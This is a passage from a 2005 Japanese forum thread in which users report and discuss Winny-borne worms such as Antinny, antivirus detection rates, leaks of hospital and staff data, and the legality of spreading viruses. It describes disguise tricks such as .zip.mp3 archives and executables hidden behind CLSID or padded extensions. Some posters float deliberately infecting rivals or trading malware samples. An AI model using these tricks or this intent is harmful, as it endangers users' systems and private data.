738[名無し]さん(bin+cue).rar:2005/06/02(木) 13:06:19 ID:l5cPCYkH0
>>734
ディレクトリ情報ってどういうときに
作成されるのでしょうか?
739[名無し]さん(bin+cue).rar:2005/06/02(木) 13:13:40 ID:DVjadbUu0
ディレクトリ = フォルダー
740[名無し]さん(bin+cue).rar:2005/06/02(木) 13:30:47 ID:1ggkIZlO0
>>7
>・ソフトを使って予め解凍する前に怪しい拡張子ファイルを削除する。
> ttp://a-t-software.hp.infoseek.co.jp/apps/delexe/index.html

このソフト使ってみたけどファイルやファイルのある場所が文字化けして
使い物にならなかった。

ほかの人は文字化けしないのかな?
741[名無し]さん(bin+cue).rar:2005/06/02(木) 13:32:48 ID:DtTpnrkr0
Lhazで中身見てから解凍してる
742[名無し]さん(bin+cue).rar:2005/06/02(木) 13:45:21 ID:nqLPgXAQ0
WinRARで(ry
743[名無し]さん(bin+cue).rar:2005/06/02(木) 13:57:52 ID:eLTL/+K00
解凍レンジってどうなんですか
744[名無し]さん(bin+cue).rar:2005/06/02(木) 14:20:58 ID:7HwHqM7y0
この手のウィルスに引っかかる椰子って、痛い目にあってもなお
+Lhacaにドラッグアンドドロップして解凍してるんだろうな。
745[名無し]さん(bin+cue).rar:2005/06/02(木) 14:21:53 ID:DbkGj/dm0
ふと、気になったんだが、
ノートン先生で予防できるものなのか?
圧縮ファイルも調べられるようにしてるんだが……。
746[名無し]さん(bin+cue).rar:2005/06/02(木) 14:40:16 ID:nqLPgXAQ0
>>745
ワクチンは既知のウイルスに対処できるだけ。
ヒューリスティックスキャンは、たまに亜種がヒットするくらい。
予防はユーザーの切磋琢磨な自己研鑽でのみ可能。
747[名無し]さん(bin+cue).rar:2005/06/02(木) 14:46:10 ID:DVjadbUu0
売り文句で「未知のウイルスにも対応!!」ってたまに書いてあるけど、
誇大広告だよなぁ・・・
748[名無し]さん(bin+cue).rar:2005/06/02(木) 14:48:24 ID:j/J3O6Gk0
ありゃ絶対誇大だろw
749[名無し]さん(bin+cue).rar:2005/06/02(木) 15:16:22 ID:/sXfOf6+0
正:(ごく稀に)未知のウイルスにも対応(できるかもしれないよ。てへっ)!!
750[名無し]さん(bin+cue).rar:2005/06/02(木) 15:20:39 ID:Y/zYM+Th0
定義ファイルの更新で未知だったウイルスにも対応という意味じゃなかったの?
751[名無し]さん(bin+cue).rar:2005/06/02(木) 15:21:59 ID:hx/Q7PHG0
おまえらみたいな雑魚がしらないウィルスにも対応してますよってことだろ
752[名無し]さん(bin+cue).rar:2005/06/02(木) 16:39:30 ID:NMDyfdbr0
雑魚プログラマーが作るであろうニュイルスを
ニュータイプの勘で未来定義作成(来年流行の悪寒)
753[名無し]さん(bin+cue).rar:2005/06/02(木) 16:44:47 ID:7wpqBT/q0
その定義ファイルを参考に新ニュイルス作成
754[名無し]さん(bin+cue).rar:2005/06/02(木) 17:14:44 ID:nqLPgXAQ0
答えから問題を作るようなもんだな。('A`)
755[名無し]さん(bin+cue).rar:2005/06/02(木) 17:49:28 ID:UhiziUF40
アンチウイルスソフト開発会社=ウィルス開発者なら、
これから流される予定のウイルスに、あらかじめ対応しておくことも容易だ。
756[名無し]さん(bin+cue).rar:2005/06/02(木) 18:29:35 ID:ajCHNiAh0
ヒューリスティックエンジンの質が良いのはNOD32
ま、そういうもんだよねぇ。
757529:2005/06/02(木) 18:30:32 ID:Vdn+dnoe0
>>709
それ持ってます。。
っていうか、開きました・・・・orz

758[名無し]さん(bin+cue).rar:2005/06/02(木) 18:40:27 ID:hx/Q7PHG0
>>757
(゜,_ゝ゜)
759[名無し]さん(bin+cue).rar:2005/06/02(木) 18:44:37 ID:54eH8cYB0
ちょっと待て。 拡張子がmp3なのになんでexeが出てくるんだ?
760[名無し]さん(bin+cue).rar:2005/06/02(木) 18:46:00 ID:7HwHqM7y0
おいおい
761[名無し]さん(bin+cue).rar:2005/06/02(木) 18:47:58 ID:hx/Q7PHG0
>>759
(゚∀゚)
762[名無し]さん(bin+cue).rar:2005/06/02(木) 19:02:08 ID:5DfhOU150
>>759
( ゚д゚)
763[名無し]さん(bin+cue).rar:2005/06/02(木) 19:13:28 ID:tX0DbBdf0
>>759
( ゚д゚)

(つд⊂)ゴシゴシ
 
(;゚д゚)

(つд⊂)ゴシゴシ
  _, ._
(;゚ Д゚) …?!
764[名無し]さん(bin+cue).rar:2005/06/02(木) 19:17:43 ID:XMx9bRQZ0
釣られてやるなんてみんな優しいな。
765[名無し]さん(bin+cue).rar:2005/06/02(木) 21:02:55 ID:U6Uxsegd0
つか.zip.mp3を解答して出てきた.exeをなんで開くのかと。
766[名無し]さん(bin+cue).rar:2005/06/02(木) 21:10:05 ID:rCPoAZe60
.zip.mp3はかなりの確率で.exe入ってるからウイルス収集家の俺としては嬉しい限りです。
767[名無し]さん(bin+cue).rar:2005/06/02(木) 21:10:26 ID:vLemXxDZ0
(´-`).。oO(・・・一時期流行ったID3タグがどうこうってやつちゃうん?)
768[名無し]さん(bin+cue).rar:2005/06/02(木) 21:16:11 ID:2pP9O7b50
(´-`).。oO(・・・そう思うなら試しに踏んでみればいいんとちゃうん?)
769[名無し]さん(bin+cue).rar:2005/06/02(木) 22:00:00 ID:ajCHNiAh0
770[名無し]さん(bin+cue).rar:2005/06/02(木) 23:43:47 ID:CGgHyW2W0
windowsならjpegの脆弱性がある。
771[名無し]さん(bin+cue).rar:2005/06/03(金) 02:13:00 ID:i6inEpO00
ウィニーで拾ったexeをネット掲示板のムカつくやつらにうpして踏ませるのは犯罪ですか?
772771:2005/06/03(金) 02:13:36 ID:i6inEpO00
exeのウィルス
773[名無し]さん(bin+cue).rar:2005/06/03(金) 02:19:39 ID:ZZmBmTqA0
踏んだ奴が被害届を出した時点で、うぷ主が加害者としての責任を負う
ウイルスとして確信してうぷっている事により、罪は重くなる
774[名無し]さん(bin+cue).rar:2005/06/03(金) 02:59:42 ID:kQTYHUl/0
器物破損になるのかな? 器物の定義をよく知らんがたぶんこれに引っかかる。
775[名無し]さん(bin+cue).rar:2005/06/03(金) 03:15:27 ID:3G7bPsPP0
up先への威力業務妨害もあるな
776[名無し]さん(bin+cue).rar:2005/06/03(金) 07:54:36 ID:SHLKmZ6b0
ウィルスによって損害が発生すれば罪になる
PCが壊れたとか機密情報が漏れたとか。

でもデスクトップのSSが晒されただけなら難しいなぁ
777[名無し]さん(bin+cue).rar:2005/06/03(金) 09:46:22 ID:LEMQ0k160
>>774
× 器物破損
○ 器物損壊
778[名無し]さん(bin+cue).rar:2005/06/03(金) 12:23:46 ID:U+pFeIqD0

ウィルス所持だけでも違法なはずだが?

http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030422/1/

779[名無し]さん(bin+cue).rar:2005/06/03(金) 13:04:22 ID:JBMLuc7t0
>>778
ウイルス作成罪は創設が検討されてるって段階で、まだ施行されて
ないんでは?
780[名無し]さん(bin+cue).rar:2005/06/03(金) 15:57:08 ID:r5tHI2SY0
え、所持(死んでいても)は違法で飼育(毎日エサやりする)は合法なの?
781ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
782[名無し]さん(bin+cue).rar:2005/06/03(金) 16:46:34 ID:DbJYOY9l0
すまん、誤爆した・・・orz
783[名無し]さん(bin+cue).rar:2005/06/03(金) 18:50:42 ID:3G7bPsPP0
所持目的によるはず。配布目的で作成・所持すると黒
その証明は検察が行うことになるのだが…難しいと思う
どっちに付けウイルス作成罪が成立したらWindowsだって…
784[名無し]さん(bin+cue).rar:2005/06/03(金) 19:07:46 ID:wqFTVRl90
通報屋さ〜ん、運営テーブルでご指名で〜す。
785[名無し]さん(bin+cue).rar:2005/06/03(金) 19:20:26 ID:T5Q38l9N0
なお、現在tmp5鯖だけ山田フィルタが一つ外れており上げると大変なので
ヲチスレ以外上げないように>各位

#ヲチスレは大喜び、いや(´・ω・) カワイソスの山だろうな
786[名無し]さん(bin+cue).rar:2005/06/03(金) 19:25:15 ID:FoXZ6kzo0
漏れは書庫ファイルはWinRARを使って中身確認してる。
それでexe踏む確率が減った。
787[名無し]さん(bin+cue).rar:2005/06/03(金) 19:36:54 ID:tTPFPusv0
解凍後にファイルの種類で並び替え。
おかしい実行形式を選択してシフト押しながらデリート。
一つだけ選択するとプレビューに情報出たりとうざい場合は
あらかじめ新しいフォルダでも一つ作って最初に選択しておき、それから消したいファイルを選択。

これでいいんじゃね?
788[名無し]さん(bin+cue).rar:2005/06/03(金) 19:49:41 ID:wqFTVRl90
山田注意報発令!!
----------------------------
http://qb5.2ch.net/test/read.cgi/operate/1116127723/

612FOX ★sage2005/06/03(金) 19:31:46 ID:???0
たまーにしか降ってこないサーバでやっても
何十時間と続けてやっても一個とか2個しか降ってこないべさ、
一回 bbs.cgi 強化して、結果がわかるのは数十時間後じゃ
やってられないべさ

ましたや、実験用のサーバでやってもお客さんが来てくれるのは
数十年後とか

ということで tmp5 でやってるべ

641FOX ★sage2005/06/03(金) 19:41:06 ID:???0
んじゃ 再開するよ

いろいろなルーチン書いたから
軽くするべく、どんどん外してイクデス。

どこかで爆撃が再開されるかもってことです
----------------------------

sage進行をお勧めします。

影響で
・書き込みができない。
・見えない。
・重い。
などが発生する場合があります。
789[名無し]さん(bin+cue).rar:2005/06/04(土) 01:09:57 ID:sSPz8/Gz0
>>786
あなた、WinRARのセキュリティタブを開いたことは無いの?
790[名無し]さん(bin+cue).rar:2005/06/04(土) 01:37:03 ID:NP2ZSqxc0
【エミュ】(PS) PS1&PS2のソフトの焼き方、遊び方のテキスト集 最新版(04.7.31)
検索用:ドラマ 鋼の錬金術師 DVD モーニング娘 ガンダム
天上天下 ドラゴンボール モンキーターンVアルバム  無修正ヒカルの碁ラブひな
 MONSTER アプリ海外ドラマ PV DVDISO お宝 アニメ映画無修正スラムダンク ポケモン.zip

これはウィルスですか?
791[名無し]さん(bin+cue).rar:2005/06/04(土) 01:53:02 ID:3HXp7Ly90
知らんがなオバケでそうな空気
792[名無し]さん(bin+cue).rar:2005/06/04(土) 03:05:24 ID:9YVG7ytk0
>>789
何それ?
詳しく
793[名無し]さん(bin+cue).rar:2005/06/04(土) 03:08:54 ID:j41ESnoz0
/ /          \ ヽ  /__      / \    /      |  ヽヽ _/_
|   ● /   ヽ ●    |  __|_ | ̄|   /       /     ̄| ̄ヽ |  /   \
|     |  /  |.      | .  人  |_|  // ̄ヽ  /⌒!    ノ   │  /  ___|
ヽ     ヽ_/ヽ__/      /  /  \       _ノ  /   \ノ ノ  ヽノ    \ノ\

794[名無し]さん(bin+cue).rar:2005/06/04(土) 03:12:45 ID:9YVG7ytk0
(´・ω・`)教えてよ
795[名無し]さん(bin+cue).rar:2005/06/04(土) 03:26:59 ID:Hao9GeK10
(´・д・`)ヤダ
796[名無し]さん(bin+cue).rar:2005/06/04(土) 03:35:17 ID:Ku7knI0c0
        ∧∧
       ヽ(・∀・)/  ズコー
      \(.\ ノ  
797[名無し]さん(bin+cue).rar:2005/06/04(土) 03:52:17 ID:sSPz8/Gz0
( ´,_ゝ`)プッ
798[名無し]さん(bin+cue).rar:2005/06/04(土) 05:39:53 ID:gGFdsaXN0
>>790みたいのを落とす人ってホントにいるんだね
799[名無し]さん(bin+cue).rar:2005/06/04(土) 11:36:44 ID:7w551J6n0
《・∀・》カタカタ
800[名無し]さん(bin+cue).rar:2005/06/04(土) 12:05:11 ID:NP2ZSqxc0
>>798
うむごくろう、落としてないよ


プッ
801[名無し]さん(bin+cue).rar:2005/06/04(土) 12:29:37 ID:KnKV4ycA0
誰だ?屁こいたのは
802[名無し]さん(bin+cue).rar:2005/06/04(土) 12:36:22 ID:2puIvy4y0
WinRARのセキュリティタブってなんだ?
たまに消せないフォルダを展開するんで、それを消す方法と混同
してるんでないか。
803[名無し]さん(bin+cue).rar:2005/06/04(土) 14:57:48 ID:SbOD6vd30
>>802
こういうのを宝の持ち腐れって言うんだな。

むしろブタに真珠か。
804[名無し]さん(bin+cue).rar:2005/06/04(土) 16:19:52 ID:kCb2Y+0L0
>>803
俺もWinRARのセキュリティタブってわからん。
検索しても>>802のことしか出てこないし、気になるから教えてくれ。
805[名無し]さん(bin+cue).rar:2005/06/04(土) 16:28:27 ID:c3WCv57g0
オプション→設定→セキュリティのタブで
「解凍から除外するファイルの種類」にチェックしておけばいいってことでしょ
806[名無し]さん(bin+cue).rar:2005/06/04(土) 16:29:28 ID:SbOD6vd30
>>805
違う
807[名無し]さん(bin+cue).rar:2005/06/04(土) 16:47:47 ID:91Ccq69W0
808[名無し]さん(bin+cue).rar:2005/06/04(土) 16:52:31 ID:SbOD6vd30
>>807
その143て俺だなw てかちゃっかり学校名まで出しちゃってるな。
本当に情報を止める気があるのか疑いたくなる依頼だなw
809[名無し]さん(bin+cue).rar:2005/06/04(土) 18:15:11 ID:EEcRGUpd0
> 一宮市の情報推進課にWinnyを使って検索を試みていただきました。
次は、上記の部署から漏れるわけか…ス
810[名無し]さん(bin+cue).rar:2005/06/04(土) 18:23:03 ID:c3WCv57g0
校長の名を装ってファイルを拡散させようとしているんじゃないか?
そんなに迂闊じゃないだろうよ・・・と思いつつも学校の先生ならやりかねないとも思えるな。
811[名無し]さん(bin+cue).rar:2005/06/04(土) 18:24:49 ID:oUdYyC4b0
これは巧妙な売名行為ですね
812[名無し]さん(bin+cue).rar:2005/06/04(土) 19:11:32 ID:9HZJ6wp40
どう考えてもネタだろ
そもそもなんでネット犯罪課かなんかが出てくるのかと
813[名無し]さん(bin+cue).rar:2005/06/04(土) 20:13:19 ID:ZJKNeJ/b0
>>803,806
で、結局セキュリティタブってどんな機能なの?
豚に真珠を脱却したいから教えてくんない?
814[名無し]さん(bin+cue).rar:2005/06/04(土) 20:52:39 ID:VXQkVbHd0
使えばわかると思うよ
815[名無し]さん(bin+cue).rar:2005/06/04(土) 21:55:00 ID:EEcRGUpd0
>>813
rarをVer.upすれば分かると思うよ
816[名無し]さん(bin+cue).rar :2005/06/04(土) 22:45:15 ID:4nTwlUnj0
608.768のサイズのウイルス
これなに?
エロアニメやエロCG関係のフォルダに偽装してる。
ノートンやavastにはかからない。
バスターにはanntiny.bのような名前だった。
山田?
817[名無し]さん(bin+cue).rar:2005/06/04(土) 23:27:21 ID:jk1rExFC0
山田亜種
818[名無し]さん(bin+cue).rar:2005/06/05(日) 01:47:11 ID:YF+HdyTo0
まだ懲りないの?の壁紙と同梱されてるケースが多いのが、山田(亜種)か?
タイムスタンプのみ異なる2種を捕獲してある(CRC32:A121DDF9)

でも、だいぶ対応が進んできたっぽいけどな。(反応あるもののみ下記)

Antivirus Version Update Result
Fortinet 2.27.0.0 06.04.2005 W32/Antinny.B-tr
Kaspersky 4.0.2.24 06.04.2005 Trojan.Win32.VB.sf
NOD32v2 1.1126 06.03.2005 probably unknown NewHeur_PE virus
Sybari 7.5.1314 06.04.2005 Trojan.Win32.VB.sf

ちょっと前までNOD32のみ反応してたのにな
819[名無し]さん(bin+cue).rar:2005/06/05(日) 02:04:29 ID:5DgACA460
とある.zipファイルをwinrarで解凍せずに開くと中に"\"という名前のフォルダがあって
普通に解凍すると壊れていて修復できないと出る
しかし修復コマンドを使うと普通に修復できて中を開くと意味不明なjpgファイルが大量に入っている

これって何?
820[名無し]さん(bin+cue).rar:2005/06/05(日) 02:06:40 ID:s1QxCjSM0
>>819
正直に言えよ、どんなエロファイルを落としたんだ?
821[名無し]さん(bin+cue).rar:2005/06/05(日) 02:07:07 ID:T1a/UBGS0
>>819
スレ違い
822[名無し]さん(bin+cue).rar:2005/06/05(日) 02:14:43 ID:5DgACA460
>>820
ツ○サ、探偵○園Qなどコミックの新刊でよく見かける

>>821
何かのウィルスかな、と思ったので
823[名無し]さん(bin+cue).rar:2005/06/05(日) 03:13:23 ID:zV9H97Fv0
>>686さん
その後どうですか? 私も同じものに…。
824[名無し]さん(bin+cue).rar:2005/06/05(日) 07:02:18 ID:H216DaYR0
>[仁義なきキンタマ] ○○のドキュメント.zip

○○の部分が女性の名前の場合、被参照量が多い件について
825[名無し]さん(bin+cue).rar:2005/06/05(日) 07:31:50 ID:7bJ0qYQf0
それほとんどがうんざり会社が流してるやつだよ
826[名無し]さん(bin+cue).rar:2005/06/05(日) 07:37:42 ID:0tgLXDIk0
女ってオレンジレンチ落とそうとしてるの多い。
827[名無し]さん(bin+cue).rar:2005/06/05(日) 09:09:40 ID:Qz2FbBYx0
http://www.uploda.org/file/uporg119001.jpg
[仁義なきキンタマ] Administratorのデスクトップ(050605-0738).jpg
828816:2005/06/05(日) 10:34:23 ID:likaWwg+0
誰かウイルスまとめてうpしてくれない?
検証したいんだけどあまり保有していない。
あるいはウイルスハッシュ教えて。
829816:2005/06/05(日) 10:39:10 ID:likaWwg+0
>>817
忘れてた。レスサンクス
830[名無し]さん(bin+cue).rar:2005/06/05(日) 10:51:14 ID:0obQskTS0
なんか医学生だか医者だかのが落ちてきた。
患者の情報ダダ漏れ。あーあ
831[名無し]さん(bin+cue).rar:2005/06/05(日) 10:58:18 ID:e2WEClhg0
>>830
イカシカやトットリのじゃなくて?
832[名無し]さん(bin+cue).rar:2005/06/05(日) 11:33:10 ID:0obQskTS0
戸ッ捕りぽい
真面目に研究してる人ぽいので(´・ω・) カワイソス
ちょっとエロ小説が好きなだけス
833[名無し]さん(bin+cue).rar:2005/06/05(日) 11:39:18 ID:oat77aK00
小説ってのが良いな
834[名無し]さん(bin+cue).rar:2005/06/05(日) 11:49:05 ID:7bJ0qYQf0
エロ小説落としてるやつけっこういるね。
仕事中に読めるからだろうか。
835[名無し]さん(bin+cue).rar:2005/06/05(日) 12:24:38 ID:57v0sKnv0
>>828

     l
l
l
l
J<NoCDミ <NoDVDミ
836[名無し]さん(bin+cue).rar:2005/06/05(日) 19:46:08 ID:Fykqw2oX0
医者関係だと「忘年会マニュアル」が5種類ぐらいに分類されているものが…
837[名無し]さん(bin+cue).rar:2005/06/05(日) 22:02:56 ID:EreB0mps0
鳥取と以下鹿のハッシュきぼんぬ
838[名無し]さん(bin+cue).rar:2005/06/05(日) 22:54:58 ID:kpzh4/bj0
>>60
今更なんだけど、これって結局新種?
モザ消し欲しいんだが・・・
839[名無し]さん(bin+cue).rar:2005/06/05(日) 23:47:25 ID:6M3sCd1a0
ジョークソフトをいじったぐらいかと

それとモザけしとか欲しかったらnyなんかじゃなくて
素直にファンサイト、改造サイトを見るべし。基本に戻り。
840[名無し]さん(bin+cue).rar:2005/06/06(月) 00:38:13 ID:aWFKIv5V0
"「当社が不正アクセスの手口を公開しない理由」,カカクコムの穐田CEO"[2005/06/02]
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050602/161996/

>具体的な手口が話題になりすぎると,
>いわゆるプロのクラッカーではない,
>一般の人まで面白半分で始めてしまうのではないかと恐れた。

「考え得る限りで最高レベルのセキュリティ対策」とか言ってた気がするが、一般人でもクラックできるのか?
841[名無し]さん(bin+cue).rar:2005/06/06(月) 00:41:42 ID:fbwaQUW40
842[名無し]さん(bin+cue).rar:2005/06/06(月) 00:46:27 ID:E9JOyUeN0
サイバーノーガード戦法、バスタークラッシュ、カカクメソッド、いろいろあるわな
nyの場合は、キンタマコップ事例、業務で使う新潟XXかねぇ
843[名無し]さん(bin+cue).rar:2005/06/06(月) 11:50:21 ID:XmxWSYJ90
>>841
上手い事言うなw
844[名無し]さん(bin+cue).rar:2005/06/06(月) 12:35:38 ID:AkkPtpG00
ttp://headlines.yahoo.co.jp/hl?a=20050606-00000007-mai-soci
どうも毎日は2chとWinnyを目の敵にしてるようで
845[名無し]さん(bin+cue).rar:2005/06/06(月) 13:27:39 ID:TU8aO/aw0
【職員名簿流出】Winnyのウイルス感染に偽装し故意に? 千葉県の病院
http://news19.2ch.net/test/read.cgi/newsplus/1118015067/
846[名無し]さん(bin+cue).rar:2005/06/06(月) 13:43:24 ID:SvZ3k4WZ0
>>844
>このウイルスによる個人情報流出が次々明らかになっていることに加え、
>「暴露の匿名掲示板」としてのウィニーの不正利用が大きな問題になりそうだ。

別にny利用者はそんなもの求めて利用してるわけではないだろうにw
あくまで利用者の「不注意・無用心」が問題なだけだろう・・・・exe踏むとか拡張子非表示なぞ論外
847[名無し]さん(bin+cue).rar:2005/06/06(月) 14:54:35 ID:pqo1br7t0
>>844
毎日は以前フシアナトラップに引っかかっただろ?

ttp://www.media-k.co.jp/jiten/wiki.cgi?%A1%E3%A4%E2%A1%E4#i3

ttp://news16.2ch.net/test/read.cgi/dqnplus/1087100043/
dat落ち(50モリタポで見れるけど)
848[名無し]さん(bin+cue).rar:2005/06/06(月) 15:18:15 ID:19VKMm410
849[名無し]さん(bin+cue).rar:2005/06/06(月) 15:24:11 ID:+FF2it860
>>848
馬鹿でかいjpg画像が1枚入ってるだけだな。 開けばOSが逝くかも知れん。
850[名無し]さん(bin+cue).rar:2005/06/06(月) 16:16:09 ID:A9Z2VAD60
>>709
exe無し。
851[名無し]さん(bin+cue).rar:2005/06/06(月) 16:17:44 ID:+FF2it860
mp3だからexeなんかあるわけないのにな。
852[名無し]さん(bin+cue).rar:2005/06/06(月) 16:24:41 ID:tR+pUBz80
お前は何を言っているんだ
853[名無し]さん(bin+cue).rar:2005/06/06(月) 16:52:07 ID:PxDMqiv50
マジで無いよ。確認済み。
854[名無し]さん(bin+cue).rar:2005/06/06(月) 17:06:32 ID:HOypcVdu0
うげ・・ウイルス入ってるよ>>709
855[名無し]さん(bin+cue).rar:2005/06/06(月) 17:16:46 ID:9DXEuDKD0
>>849
確かにでかいな。展開したら1GBオーバーした。
中身はInvalid Dataって言われて見られなかったけど。
856[名無し]さん(bin+cue).rar:2005/06/06(月) 18:19:05 ID:0XKVMhms0
zip.mp3を解凍したらexeでるだろうが
857[名無し]さん(bin+cue).rar:2005/06/06(月) 18:49:59 ID:EipinSib0
>>849
これテキストファイルだよ
内容は”死にたい”の繰り返し
858[名無し]さん(bin+cue).rar:2005/06/06(月) 19:02:48 ID:7yc1J0bC0
山田って最初はあぷろだ?
放流元がny、shareなら厳しいけどろだ発なら
859[名無し]さん(bin+cue).rar:2005/06/06(月) 19:06:02 ID:E9JOyUeN0
山田は、その起源が明らかになっていない
一応、ロダ説が有力だが
バックドア機能も持ってるので、感染者が中継してるのかも
860[名無し]さん(bin+cue).rar:2005/06/06(月) 19:36:24 ID:np1rifyv0
仁義なしキンタマで個人情報流出と言えば、病院関係の他にも、関西の通信会社(ケイ・・・)もあったはず
あそこは前にも流出騒ぎがあったw

今回は騒がれていないのかな>毎日さん、記事のチャンスでは?w
861[名無し]さん(bin+cue).rar:2005/06/06(月) 19:44:08 ID:jKl2dqWF0
>>856
なんのexeなんだよw
862[名無し]さん(bin+cue).rar:2005/06/06(月) 19:48:28 ID:0XKVMhms0
>>861
違うやつ落としたんじゃない?
↓こんなの入ってた
ラヴ・パレード.exe.{00022601-0000-0000-C000-000000000046}
ラヴ・パレード                      .exe
863[名無し]さん(bin+cue).rar:2005/06/06(月) 20:15:47 ID:SvZ3k4WZ0
>>848
(出ないの解かってるが)バスターのウィルスチェックで1分51秒もかかったw
864[名無し]さん(bin+cue).rar:2005/06/06(月) 20:23:07 ID:SvZ3k4WZ0
>>848
Lhaz で閲覧
タカヤ.jpg・・・・1,178,494KB
確かに下手すりゃPC逝っちゃうねw
865[名無し]さん(bin+cue).rar:2005/06/06(月) 21:22:07 ID:JpUie0vm0
【使用OS】WindowsXP
【WindowsUpdateしてるか】してません
【使用AntiVirusソフト】マカフィー
【AntiVirusをUpdateしてるか】してません
【Winnyのバージョン】?
【Winny歴、総DL量】?
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】てんプレにはのってません
【症状、具体的に分かる限りすべて書く】
パソコンの中のmp3ファイルが全部イカレました
「メディアプレイヤーでいける種類の物ではありません」と出たので、
拡張子をtxtにして開いてみたら「ぬルポ」って書いてありました
【何をしたらそんなことになったのか】
友人から「これ聞け」っつってわたされたCDのなかのサントラのアーカイブファイルが原因だったのか・・・?
私のノパソはインターネットにつないでいないのでそれしかないと思う・・・
ソフトシンセ開いて再生してみたら、生音トラックも普通に再生できていたのでWAVファイルには影響ないのだと思う
1曲ためしにミックスダウンしてmp3ファイル作ってみたけど その出来たてmp3は普通に再生できます。。。
最悪の場合リカバリってもいいのですが、手軽に駆除するほう方はありませんか?
866865:2005/06/06(月) 21:33:31 ID:JpUie0vm0
ageさしてもらいます。おねがいします
865の
>【テンプレにある対策を実行したか】てんプレにはのってません
は間違いです。対策はしていませんでした
867[名無し]さん(bin+cue).rar:2005/06/06(月) 21:45:53 ID:Sj/S5+eR0
>865-866

       ::::::::::::::::::::∧_∧ 
       ::::::::: <`∀´∩> アー!アー!きこえなーいニダ!アー!
          _.. /^ソ⌒ヽヽ
-― ―'ー'-''―-''<_<_ノ、_ソ―'''ー'-''――'`'
868[名無し]さん(bin+cue).rar:2005/06/06(月) 21:59:06 ID:rTYKgNmx0
>>865
Winnyで流れている"新種の"ワーム、ウイルス等を報告・調査・対処をするスレです
869[名無し]さん(bin+cue).rar:2005/06/06(月) 22:06:08 ID:rqGfF9On0
>>865
32か?
870[名無し]さん(bin+cue).rar:2005/06/06(月) 22:19:34 ID:pqo1br7t0
>>859
最初に見つかったのは苺5M
無論、その前に放流してた可能性も否定できないが、
それなら同じものが流れると思う
871865:2005/06/06(月) 22:27:50 ID:JpUie0vm0
>>868
すいませんでした。他いってきます
872[名無し]さん(bin+cue).rar:2005/06/06(月) 22:37:05 ID:E9JOyUeN0
しかし、毎日もキンタマコップの情報をもっと克明に追えばいいのに
873[名無し]さん(bin+cue).rar:2005/06/07(火) 00:16:23 ID:yP1/O9Pg0
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.R#solution

↑のページに書いてあるウイルスにかかったんですが どうやって駆除すればいいですか?
874ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
875[名無し]さん(bin+cue).rar:2005/06/07(火) 01:19:30 ID:3a2CWOcI0
>>874
それ、俺も知ってるわ。
確か、ノートン先生で起動前にチェックしたけど何にも出てこなかった。
で、.exeの部分を.txtにして中身見てみたら、なんか色んな文章かいて
あった記憶があるよ。
俺の見解では「ウィルス」ではないと思うが、
他の人たちの見解も聞いてみたほうがいいよ。
876[名無し]さん(bin+cue).rar:2005/06/07(火) 01:41:36 ID:T9NGKWKG0
>>874
オンラインスキャンはやった?
877874:2005/06/07(火) 01:45:35 ID:dHATNyZB0
う、すいません、OSはXP SP2で、小まめにアップデートはかけているので最新版だと思います。
Shareのキャッシュは60GB程で、テンプレのものは確認しましたが、違うようです。
症状は今のところよくわかりません。
突然GoogleやMicrosoft等に繋がらなくなります(ページが表示できないと出る)。
暫くするとまた元に戻るので、回線の所為だと思うのですが……。
使用antivirusソフトは>>874の通りavast!の最新定義ファイル適用済みです。
……と、何故か全く書き込めなくなった間にSpybotで未検出、
シマンテックオンラインスキャンでも未検出でした。

うーん、特に害はないようですし……何なのだろう。

>>875
ゴミ箱から引きずり出してtxtにして色々文字コードも弄ってみましたが、
特に何か書いてあるようにも…みえないです。
878[名無し]さん(bin+cue).rar:2005/06/07(火) 01:49:55 ID:bYPMLmpv0
>>872
毎日ごときに克明な情報を求めるだけムダ。
一般でマトモな情報を出しているのは●●だけ。
879[名無し]さん(bin+cue).rar:2005/06/07(火) 02:05:33 ID:io/avYJZ0
>>877
対象ファイルが特定できているなら
ttp://www.virustotal.com/flash/index_en.html
ここへ投げてみると、NOD32あたりがなにか検出やもしれんな

>>878
872を、どう読めばそう応えられるんだ?
880[名無し]さん(bin+cue).rar:2005/06/07(火) 02:12:07 ID:dHATNyZB0
>>879
うわ、そんなすごいサイトがあったんですね
トレンドマイクロオンラインスキャンでも引っかからず、
そちらでも音沙汰なしでした。
相当な新手か、ただのジョークの様なので、
どう足掻いても無駄そうですね……。

何かあればまた報告に上がります。
一応>>874のファイル名、ハッシュのファイルには皆さんお気をつけて……。
881[名無し]さん(bin+cue).rar:2005/06/07(火) 02:27:24 ID:18V6Pd530
新種のウイルスを効率的に入手するには、それっぽいキーワードでnyとかその他類似ソフトを走らせておくのが1番?
まだほとんど検出されないやつをベンダーに送りたいんだが。

それともここで、
【ウイルス】1番数が多かったやつに \5,000【ワーム】
というスレを立てるとか…だめか、だめだよな。
882[名無し]さん(bin+cue).rar:2005/06/07(火) 02:32:02 ID:l5XlM6HA0
>>874 安心しなよ。ただの山田ウイルスの亜種だから。
883[名無し]さん(bin+cue).rar:2005/06/07(火) 02:36:02 ID:UiZrTfuC0
>881
ジャンプで圧倒的に入手出来る
最近ではアルバムもか
884[名無し]さん(bin+cue).rar:2005/06/07(火) 02:38:22 ID:Rep2zc830
しかし、どうしても山田さんを手に入れたい奴がいるんだね
あちこちのスレで必死にクレクレ君やってる奴。
885[名無し]さん(bin+cue).rar:2005/06/07(火) 02:42:57 ID:Rep2zc830
>>881
その作業は通報屋さんがコンスタントにやってるから
彼がそれに飽きるか、何かの理由で続けられなくなってからで良いんじゃない?
886[名無し]さん(bin+cue).rar:2005/06/07(火) 02:45:20 ID:18V6Pd530
ジャンプですね、ども。

>>885
通報屋が多すぎて困るほどにはならないと思う。
887[名無し]さん(bin+cue).rar:2005/06/07(火) 06:10:19 ID:io/avYJZ0
>>882
山田亜種なら何らかの反応が出ると思うけどね
888[名無し]さん(bin+cue).rar:2005/06/07(火) 06:44:48 ID:d/MMZbLI0
俺思うんだが、これだけウイルス被害がありうっとおしいのに、
ウイルス作者ってあんま叩かれないんだよな。なんで?
889[名無し]さん(bin+cue).rar:2005/06/07(火) 06:47:16 ID:Ydr+W6DN0
>>886
